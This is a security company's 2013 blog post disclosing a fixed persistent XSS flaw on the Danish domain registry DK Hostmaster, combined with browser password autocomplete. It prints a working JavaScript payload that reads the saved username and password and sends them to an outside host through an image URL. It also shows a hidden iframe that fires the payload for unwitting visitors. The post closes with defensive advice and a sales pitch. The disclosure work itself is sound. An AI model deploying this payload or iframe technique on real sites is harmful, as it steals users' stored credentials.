Latest News

Posted: April 23, 2013

Many websites have a login form where users provide username and password. The default behaviour for browsers is to allow users to store these credentials locally in the browser. Thereby, the next time a similar form appears, the username and password are already populated as seen in Figure 1. This is easy for the user but not secure.

Autocomplete

First of all it is very easy to retrieve the password in clear-text. You can try to go to a page where you may have stored a username and password. In most browsers you can right-click on the password field and select “Inspect element”. This brings up some of the HTML source code as seen from Figure 2. There is an attribute named “type” with the value “password”. Replace the value with “text” and you will see the password in clear-text.

Autocomplete Password

This information can be exploited by attackers. The obvious is when an attacker gains direct access to your computer, e.g., if anyone “just wanna check the news” on your computer.

Proof of Concept

If your web-site allows autocompletion and if it also contains a Cross Site Scripting (XSS) vulnerability it is open to very dangerous attacks.

Example: The Danish top-level domain registry DK Hostmaster allows autocompletion and in 2012 Hackavoid found a (Persistent) XSS vulnerability on their web-site. We helped them fix the vulnerability and they approved the publication of the details. Thereby, we avoided a potential massive password leak. With the password in hand you are free to shut down domain names, reroute traffic etc.

With JavaScript it is possible to retrieve the value of INPUT fields such as username and password fields. A simple example:

 var username = document.getElementById('user').value;
 var password = document.getElementById('pass').value;

As a PoC we created a script that retrieved the username and password from the DK Hostmaster page using JavaScript and send it back to us. It looked like:

 <!-- Persistant XSS -->
 <script>
      setTimeout(function() {getPass();},500);
      function getPass() {
           var username = document.getElementById('user').value;
           var password = document.getElementById('pass').value;
           document.write("<img src='https://www.hackavoid.com/gotit?username=" + username + "&password=" + password+"' />");
      }
 </script>

Notice, the small delay of 500 ms since the browser needs a little time to populate the form fields with the credentials. Now when a user visits the DK Hostmaster page containing this Persistent XSS exploit script we get the credentials as seen from Figure 3.

Request With Credentials

The next step was to get the username and password from other users. On a simple web-page - let’s call it www.secavoid.com we placed a hidden IFRAME:

 <iframe src="https://www.dk-hostmaster.dk/index.php?input=hackavoid.com&ns=&id=94&lang=da" style="visibility:hidden"></iframe>

Thereby, when any user visited www.secavoid.com the IFRAME was loaded in the background resulting in a HTTP GET request to “https://www.dk-hostmaster.dk/index.php?input=hackavoid.com&ns=&id=94&lang=da” that contained the Persistent XSS exploit script shown above. Since it is the user that makes the request any username and password stored in the browser is displayed in this hidden IFRAME. Therefore, the exploit script will retrieve the users credentials and send them back to us without his knowledge.

So, because of autocomplete and a XSS vulnerability we were able to retrieve all stored username and password to DK Hostmasters web-page from the users that visited our attack site.

What to do?

On all of your login forms you should add the attribute “autocomplete” and set the value to “off”. And of course avoid XSS vulnerabilities.

If you have a hard time finding all the login forms missing the attribute and if you want a scanner to find the XSS vulnerabilities, Hackavoid.com can help you. We give you one test scan for free.